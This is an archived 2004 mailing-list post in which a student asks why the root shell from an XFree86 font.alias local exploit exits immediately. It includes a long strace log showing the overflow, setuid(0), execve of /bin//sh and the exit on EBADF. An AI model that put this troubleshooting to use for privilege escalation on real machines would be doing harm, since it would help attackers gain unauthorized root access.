XFree86 font.alias exploit hangup....
From: Dev <u02113 () cs unipune ernet in>
Date: 22 Feb 2004 10:51:18 -0000
Hello ppl, Apart from the few tweaks required to make most exploits work (especially recently, like changing /tmp//id to /bin//sh in the XFree86 font.alias local exploit et al.), I guess some more work is required to get the root shell. My problem is that once I launch the exploit the X display appears momentarily & the keyboard locks up, so now I can only access the box from the network & on a different shell. Offsets etc. are all fine & an strace yields the following log, which does indicate that the exploit was successful & execve'd /bin//sh. But I am confused about the last few lines of the strace log. [ffffe002] fcntl64(8, F_SETFL, O_RDWR|O_NONBLOCK|O_ASYNC) = 0 [ffffe002] getpid() = 997 [ffffe002] fcntl64(8, F_SETOWN, 997) = 0 [ffffe002] rt_sigaction(SIGIO, {0x809d800, [IO], SA_RESTORER, 0x420275c8}, {0x809d800, [IO], SA_RESTORER, 0x420275c8}, 8) = 0 [ffffe002] rt_sigprocmask(SIG_UNBLOCK, [IO], NULL, 8) = 0 [ffffe002] rt_sigprocmask(SIG_BLOCK, [IO], [], 8) = 0 [ffffe002] rt_sigprocmask(SIG_UNBLOCK, [IO], NULL, 8) = 0 [ffffe002] brk(0) = 0x8735000 [ffffe002] brk(0x8736000) = 0x8736000 [ffffe002] open("/tmp/fonts.dir", O_RDONLY) = 9 [ffffe002] fstat64(9, {st_mode=S_IFREG|0600, st_size=68, ...}) = 0 [ffffe002] fstat64(9, {st_mode=S_IFREG|0600, st_size=68, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40027000 [ffffe002] read(9, "1\naaaa.pcf -aaaa-fixed-small-a-s"..., 4096) = 68 [ffffe002] read(9, "", 4096) = 0 [ffffe002] brk(0) = 0x8736000 [ffffe002] brk(0x8739000) = 0x8739000 [ffffe002] read(9, "", 4096) = 0 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40027000, 4096) = 0 [ffffe002] open("/tmp/fonts.alias", O_RDONLY) = 9 [ffffe002] fstat64(9, {st_mode=S_IFREG|0600, st_size=1059, ...}) = 0 [ffffe002] fstat64(9, {st_mode=S_IFREG|0600, st_size=1059, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40027000 [ffffe002] read(9, 
"|\336\377\277|\336\377\277|\336\377\277|\336\377\277|\336"..., 4096) = 1059 [ffffe002] brk(0) = 0x8739000 [ffffe002] brk(0x873a000) = 0x873a000 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40027000, 4096) = 0 [bfffffd4] setuid(0) = 0 ===>> [bfffffec] execve("/bin//sh", ["/bin//sh"], [/* 96 vars */]) = 0 [4001117d] uname({sys="Linux", node="cs109.cs.unipune.ernet.in", ...}) = 0 [4000fb85] brk(0) = 0x80e5b54 [400110bd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000 [40010b44] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) [40010b44] open("/etc/ld.so.cache", O_RDONLY) = 9 [400109bd] fstat64(9, {st_mode=S_IFREG|0644, st_size=115094, ...}) = 0 [400110bd] old_mmap(NULL, 115094, PROT_READ, MAP_PRIVATE, 9, 0) = 0x40017000 [40010b7d] close(9) = 0 [40010b44] open("/lib/libtermcap.so.2", O_RDONLY) = 9 [40010bc4] read(9, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\r\0"..., 512) = 512 [400109bd] fstat64(9, {st_mode=S_IFREG|0755, st_size=11784, ...}) = 0 [400110bd] old_mmap(NULL, 14856, PROT_READ|PROT_EXEC, MAP_PRIVATE, 9, 0) = 0x40034000 [400110bd] old_mmap(0x40037000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 9, 0x2000) = 0x40037000 [40010b7d] close(9) = 0 [40010b44] open("/lib/libdl.so.2", O_RDONLY) = 9 [40010bc4] read(9, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\26"..., 512) = 512 [400109bd] fstat64(9, {st_mode=S_IFREG|0755, st_size=15084, ...}) = 0 [400110bd] old_mmap(NULL, 8620, PROT_READ|PROT_EXEC, MAP_PRIVATE, 9, 0) = 0x40038000 [400110bd] old_mmap(0x4003a000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 9, 0x2000) = 0x4003a000 [40010b7d] close(9) = 0 [40010b44] open("/lib/tls/libc.so.6", O_RDONLY) = 9 [40010bc4] read(9, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`V\1B4\0"..., 512) = 512 [400109bd] fstat64(9, {st_mode=S_IFREG|0755, st_size=1531064, ...}) = 0 [400110bd] old_mmap(0x42000000, 1257224, PROT_READ|PROT_EXEC, MAP_PRIVATE, 9, 0) = 0x42000000 
[400110bd] old_mmap(0x4212e000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 9, 0x12e000) = 0x4212e000 [400110bd] old_mmap(0x42131000, 7944, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42131000 [40010b7d] close(9) = 0 [400110bd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4003b000 [400016f3] set_thread_area({entry_number:-1 -> 6, base_addr:0x4003b280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 [40011101] munmap(0x40017000, 115094) = 0 [ffffe002] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 [ffffe002] open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address) [ffffe002] ioctl(0, SNDCTL_TMR_TIMEBASE, 0xbffff5c0) = -1 ENOTTY (Inappropriate ioctl for device) [ffffe002] brk(0) = 0x80e5b54 [ffffe002] brk(0) = 0x80e5b54 [ffffe002] brk(0x80e6000) = 0x80e6000 [ffffe002] brk(0) = 0x80e6000 [ffffe002] brk(0x80e7000) = 0x80e7000 [ffffe002] getuid32() = 0 [ffffe002] getgid32() = 0 [ffffe002] geteuid32() = 0 [ffffe002] getegid32() = 0 [ffffe002] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 [ffffe002] time(NULL) = 1077445115 [ffffe002] brk(0) = 0x80e7000 [ffffe002] brk(0x80e8000) = 0x80e8000 [ffffe002] ioctl(0, SNDCTL_TMR_TIMEBASE, 0xbffff710) = -1 ENOTTY (Inappropriate ioctl for device) [ffffe002] brk(0) = 0x80e8000 [ffffe002] brk(0x80e9000) = 0x80e9000 [ffffe002] open("/etc/mtab", O_RDONLY) = 9 [ffffe002] fstat64(9, {st_mode=S_IFREG|0644, st_size=337, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 [ffffe002] read(9, "/dev/hda1 / ext3 rw 0 0\nnone /pr"..., 4096) = 337 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40017000, 4096) = 0 [ffffe002] open("/proc/meminfo", O_RDONLY) = 9 [ffffe002] fstat64(9, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 [ffffe002] read(9, " 
total: used: free:"..., 4096) = 650 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40017000, 4096) = 0 [ffffe002] brk(0) = 0x80e9000 [ffffe002] brk(0x80ea000) = 0x80ea000 [ffffe002] rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 [ffffe002] rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0 [ffffe002] uname({sys="Linux", node="cs109.cs.unipune.ernet.in", ...}) = 0 [ffffe002] brk(0) = 0x80ea000 [ffffe002] brk(0x80ec000) = 0x80ec000 [ffffe002] getcwd("/root", 4096) = 6 [ffffe002] getpid() = 997 [ffffe002] getppid() = 996 [ffffe002] socket(PF_UNIX, SOCK_STREAM, 0) = 9 [ffffe002] connect(9, {sa_family=AF_UNIX, path="/var/run/.nscd_socket"}, 110) = -1 ENOENT (No such file or directory) [ffffe002] close(9) = 0 [ffffe002] open("/etc/nsswitch.conf", O_RDONLY) = 9 [ffffe002] fstat64(9, {st_mode=S_IFREG|0644, st_size=1718, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 [ffffe002] read(9, "#\n# /etc/nsswitch.conf\n#\n# An ex"..., 4096) = 1718 [ffffe002] read(9, "", 4096) = 0 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40017000, 4096) = 0 [40010b44] open("/etc/ld.so.cache", O_RDONLY) = 9 [400109bd] fstat64(9, {st_mode=S_IFREG|0644, st_size=115094, ...}) = 0 [400110bd] old_mmap(NULL, 115094, PROT_READ, MAP_PRIVATE, 9, 0) = 0x40017000 [40010b7d] close(9) = 0 [40010b44] open("/lib/libnss_files.so.2", O_RDONLY) = 9 [40010bc4] read(9, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\35\0"..., 512) = 512 [400109bd] fstat64(9, {st_mode=S_IFREG|0755, st_size=52472, ...}) = 0 [ffffe002] brk(0) = 0x80ec000 [ffffe002] brk(0x80ed000) = 0x80ed000 [400110bd] old_mmap(NULL, 
47068, PROT_READ|PROT_EXEC, MAP_PRIVATE, 9, 0) = 0x4003c000 [400110bd] old_mmap(0x40047000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 9, 0xa000) = 0x40047000 [40010b7d] close(9) = 0 [40011101] munmap(0x40017000, 115094) = 0 [ffffe002] open("/etc/passwd", O_RDONLY) = 9 [ffffe002] fcntl64(9, F_GETFD) = 0 [ffffe002] fcntl64(9, F_SETFD, FD_CLOEXEC) = 0 [ffffe002] fstat64(9, {st_mode=S_IFREG|0644, st_size=2407, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 [ffffe002] read(9, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 2407 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40017000, 4096) = 0 [ffffe002] getpgrp() = 997 [ffffe002] rt_sigaction(SIGCHLD, {0x8076d30, [], SA_RESTORER, 0x420275c8}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 [ffffe002] fcntl64(0, F_GETFL) = 0x1 (flags O_WRONLY) [ffffe002] fstat64(0, {st_mode=S_IFREG|0644, st_size=51131, ...}) = 0 [ffffe002] _llseek(0, 0, [51131], SEEK_CUR) = 0 [ffffe002] brk(0) = 0x80ed000 [ffffe002] brk(0x80ef000) = 0x80ef000 [ffffe002] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 ==> what's this? [ffffe002] read(0, 0x80ed008, 8176) = -1 EBADF (Bad file descriptor) ==> so what happens to my root shell here? [ffffe002] exit_group(0) = ? Please tell me whether my root shell exited because of some error in the last few calls. Thanks & regards Devrat Mittal u02113 () cs unipune ernet in Department of Computer Science University of Pune.